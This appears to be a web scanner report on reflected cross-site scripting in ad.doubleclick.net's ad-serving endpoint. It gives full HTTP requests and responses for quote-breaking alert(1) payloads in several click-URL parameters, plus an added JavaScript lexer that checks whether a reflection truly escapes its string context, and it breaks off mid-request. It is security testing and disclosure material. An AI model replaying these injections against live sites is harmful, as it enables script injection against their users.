GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=a3ca3'-alert(1)-'54b41a5bbc9 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6627 Cache-Control: no-cache Pragma: no-cache Date: Sun, 20 Mar 2011 17:31:12 GMT Expires: Sun, 20 Mar 2011 17:31:12 GMT
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... 0%3B57514523%3B933-120/600%3B40789782/40807569/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=a3ca3'-alert(1)-'54b41a5bbc9http://data.aggregateknowledge.com/pixel!t=651!?che=2992431&camid=5095412&plaid=57514523&creid=40789782&adgid=234167733&l1=http%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Fpromotion%2Fspecialoffers.jsp%3Fc ...[SNIP]...
The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73347"-alert(1)-"54369acb972 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=73347"-alert(1)-"54369acb972 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6580 Cache-Control: no-cache Pragma: no-cache Date: Sun, 20 Mar 2011 17:31:07 GMT Expires: Sun, 20 Mar 2011 17:31:07 GMT
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... 0x600_030411_CPO_GENERIC.jpg"; var minV = 6; var FWH = ' width="120" height="600" '; var url = escape("http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=73347"-alert(1)-"54369acb972http://data.aggregateknowledge.com/pixel!t=651!?che=2987869&camid=5095412&plaid=57514523&creid=40960228&adgid=234167733&l1=http%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Fsplash%2Fpreowned.jsp%3Fcid%3DBAC ...[SNIP]...
The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89c6c'-alert(1)-'73fc593881c was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=389c6c'-alert(1)-'73fc593881c&sid=54113&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:30:36 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:30:36 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6814
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... 0/f/7e/%2a/n%3B234167733%3B2-0%3B0%3B57514523%3B933-120/600%3B41089600/41107387/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=389c6c'-alert(1)-'73fc593881c&sid=54113&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2956869%26camid%3D5095412%26plaid%3D57514523%26creid%3D41089600%26adgid%3D234167733%26l1%3Dhttp%253A ...[SNIP]...
The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68d2a"-alert(1)-"e05a90d3bd2 was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=368d2a"-alert(1)-"e05a90d3bd2&sid=54113&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:30:32 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:30:32 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6736
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... = "http://s0.2mdn.net/2981993/120x600_030411_CPO_GENERIC.jpg"; var minV = 6; var FWH = ' width="120" height="600" '; var url = escape("http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=368d2a"-alert(1)-"e05a90d3bd2&sid=54113&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2952619%26camid%3D5095412%26plaid%3D57514523%26creid%3D40960228%26adgid%3D234167733%26l1%3Dhttp%253A ...[SNIP]...
The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f31f6'-alert(1)-'d0891efa218 was submitted in the mid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855f31f6'-alert(1)-'d0891efa218&m=3&sid=54113&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:30:28 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:30:28 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6736
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... /3ad0/f/7e/%2a/p%3B234167733%3B1-0%3B0%3B57514523%3B933-120/600%3B40960228/40978015/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=232134&mid=513855f31f6'-alert(1)-'d0891efa218&m=3&sid=54113&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2948384%26camid%3D5095412%26plaid%3D57514523%26creid%3D40960228%26adgid%3D234167733%26l1%3Dhttp% ...[SNIP]...
The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d1c2"-alert(1)-"4b605587bb4 was submitted in the mid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=5138555d1c2"-alert(1)-"4b605587bb4&m=3&sid=54113&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:30:23 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:30:23 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6778
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... gif = "http://s0.2mdn.net/2981993/120x600_031811_FREE_PHONES.jpg"; var minV = 6; var FWH = ' width="120" height="600" '; var url = escape("http://media.fastclick.net/w/click.here?cid=232134&mid=5138555d1c2"-alert(1)-"4b605587bb4&m=3&sid=54113&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2943603%26camid%3D5095412%26plaid%3D57514523%26creid%3D41205115%26adgid%3D234167733%26l1%3Dhttp% ...[SNIP]...
The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98471'-alert(1)-'72c05b45424 was submitted in the sid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=5411398471'-alert(1)-'72c05b45424&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:30:45 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:30:45 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6789
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... /a%3B234167733%3B0-0%3B0%3B57514523%3B933-120/600%3B40789782/40807569/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=5411398471'-alert(1)-'72c05b45424&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2965384%26camid%3D5095412%26plaid%3D57514523%26creid%3D40789782%26adgid%3D234167733%26l1%3Dhttp%253A%252F%252F ...[SNIP]...
The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f733"-alert(1)-"083c600f6c8 was submitted in the sid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=541135f733"-alert(1)-"083c600f6c8&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:30:40 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:30:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6736
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... /s0.2mdn.net/2981993/120x600_030411_CPO_GENERIC.jpg"; var minV = 6; var FWH = ' width="120" height="600" '; var url = escape("http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=541135f733"-alert(1)-"083c600f6c8&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2961119%26camid%3D5095412%26plaid%3D57514523%26creid%3D40960228%26adgid%3D234167733%26l1%3Dhttp%253A%252F%252F ...[SNIP]...
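The two sid findings above (one payload with single quotes, one with double quotes) are the scanner's way of probing both JavaScript string contexts. The following is an added example, not part of the scan report, of the manual confirmation the report itself recommends: a small lexer that decides, for a response body and a payload of the report's shape, which kind of string literal the canary landed in and whether its quote character actually terminated that literal. The response fragments are constructed and abbreviated from the bodies quoted above; the lexer deliberately ignores regular-expression literals, which these generated ad scripts do not contain.

```javascript
// Added example, not part of the scan report: a context-aware check of the
// "copied into a JavaScript string encapsulated in single/double quotation
// marks" claim made for each finding. It answers two questions a plain string
// match does not: which kind of literal the canary landed in, and whether the
// canary's quote really terminated that literal (an escaped \" or \' reflection,
// or a " inside a '-delimited string, is not exploitable this way).

// Lexer state at byte offset `pos`. Tracks only string literals (' " `),
// backslash escapes and comments; regex literals are not modelled (assumption:
// adequate for the generated ad scripts in this report).
function contextAt(script, pos) {
  let state = 'code'; // 'code' | "'" | '"' | '`' | 'line' | 'block'
  for (let i = 0; i < pos && i < script.length; i++) {
    const ch = script[i];
    if (state === 'code') {
      if (ch === "'" || ch === '"' || ch === '`') state = ch;
      else if (ch === '/' && script[i + 1] === '/') { state = 'line'; i++; }
      else if (ch === '/' && script[i + 1] === '*') { state = 'block'; i++; }
    } else if (state === 'line') {
      if (ch === '\n') state = 'code';
    } else if (state === 'block') {
      if (ch === '*' && script[i + 1] === '/') { state = 'code'; i++; }
    } else if (ch === '\\') {
      i++; // an escaped character never closes the literal
    } else if (ch === state) {
      state = 'code';
    }
  }
  return state;
}

// `payload` has the report's shape: <hex prefix><quote>-alert(1)-<quote><hex suffix>.
function analyseReflection(script, payload) {
  const m = /^([0-9a-f]+)(['"])-alert\(1\)-\2([0-9a-f]+)$/.exec(payload);
  if (!m) throw new Error("payload must look like 98471'-alert(1)-'72c05b45424");
  const [, prefix, quote, suffix] = m;
  const start = script.indexOf(prefix);
  const end = start < 0 ? -1 : script.indexOf(suffix, start + prefix.length);
  if (end < 0) return { reflected: false, unmodified: false, enclosing: null, breaksOut: false };
  const echoed = script.slice(start + prefix.length, end);   // what came back between the markers
  const unmodified = echoed === quote + '-alert(1)-' + quote;
  const enclosing = contextAt(script, start);                 // literal type around the prefix
  const quoteAt = start + prefix.length;
  const breaksOut = unmodified && enclosing === quote && contextAt(script, quoteAt + 1) === 'code';
  return { reflected: true, unmodified, enclosing, breaksOut };
}

// Constructed response fragments modelled on the bodies quoted above (shortened).
const SINGLE_QUOTED_CONTEXT = String.raw`document.write('<a href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/%2a/a%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=5411398471'-alert(1)-'72c05b45424&c=0&tp=3\" target=\"_blank\">');`;
const DOUBLE_QUOTED_CONTEXT = String.raw`var minV = 6; var FWH = ' width="120" height="600" '; var url = escape("http://media.fastclick.net/w/click.here?cid=232134dd29a"-alert(1)-"95130e758d8&mid=513855&m=3&sid=54113");`;
// What a fixed server would have returned: the quote is backslash-escaped.
const ESCAPED_REFLECTION = String.raw`var url = escape("http://media.fastclick.net/w/click.here?cid=232134dd29a\"-alert(1)-\"95130e758d8&mid=513855");`;
// A double-quote canary landing inside the single-quoted literal: reflected, but harmless there.
const WRONG_QUOTE_CONTEXT = SINGLE_QUOTED_CONTEXT.replace("98471'-alert(1)-'72c05b45424", 'dd29a"-alert(1)-"95130e758d8');

for (const [name, script, payload] of [
  ['sid, single-quoted', SINGLE_QUOTED_CONTEXT, "98471'-alert(1)-'72c05b45424"],
  ['cid, double-quoted', DOUBLE_QUOTED_CONTEXT, 'dd29a"-alert(1)-"95130e758d8'],
  ['escaped by server', ESCAPED_REFLECTION, 'dd29a"-alert(1)-"95130e758d8'],
  ['quote type mismatch', WRONG_QUOTE_CONTEXT, 'dd29a"-alert(1)-"95130e758d8'],
]) {
  console.log(name, JSON.stringify(analyseReflection(script, payload)));
}
```

Only a result with breaksOut true corresponds to a real finding; the other two outcomes (escaped reflection, quote mismatch) are exactly the cases where a scanner's "echoed unmodified" heuristic or a grep for the canary would over-report.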
The scanner labels this injection point the sz request parameter, but the request shows the payload dd29a"-alert(1)-"95130e758d8 appended to the cid value inside the nested click= URL (cid=232134dd29a"-alert(1)-"95130e758d8). That value is copied into a JavaScript string which is encapsulated in double quotation marks, and the input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134dd29a"-alert(1)-"95130e758d8&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:30:14 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:30:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6778
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... S.swf"; var gif = "http://s0.2mdn.net/2981993/120x600_031811_FREE_PHONES.jpg"; var minV = 6; var FWH = ' width="120" height="600" '; var url = escape("http://media.fastclick.net/w/click.here?cid=232134dd29a"-alert(1)-"95130e758d8&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2934962%26camid%3D5095412%26plaid%3D57514523%26creid%3D41205115%26adgid%3D234167733%2 ...[SNIP]...
The scanner labels this injection point the sz request parameter, but the request shows the payload 57012'-alert(1)-'cc2251629ad appended to the cid value inside the nested click= URL (cid=23213457012'-alert(1)-'cc2251629ad). That value is copied into a JavaScript string which is encapsulated in single quotation marks, and the input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=23213457012'-alert(1)-'cc2251629ad&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:30:19 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:30:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6778
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... ck%3Bh%3Dv8/3ad0/f/7e/%2a/g%3B234167733%3B3-0%3B0%3B57514523%3B933-120/600%3B41205115/41222902/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=23213457012'-alert(1)-'cc2251629ad&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2939384%26camid%3D5095412%26plaid%3D57514523%26creid%3D41205115%26adgid%3D234167733%2 ...[SNIP]...
The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa4b0"-alert(1)-"3a43cb8c8f2 was submitted in the tp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=3fa4b0"-alert(1)-"3a43cb8c8f2&forced_click=;ord=20110320172908? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:30:59 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:30:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6778
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... net/2981993/120x600_031811_FREE_PHONES.jpg"; var minV = 6; var FWH = ' width="120" height="600" '; var url = escape("http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=3fa4b0"-alert(1)-"3a43cb8c8f2&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2979416%26camid%3D5095412%26plaid%3D57514523%26creid%3D41205115%26adgid%3D234167733%26l1%3Dhttp%253A%252F%252Fwww.veriz ...[SNIP]...
The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62c27'-alert(1)-'c032322ba12 was submitted in the tp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=362c27'-alert(1)-'c032322ba12&forced_click=;ord=20110320172908? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
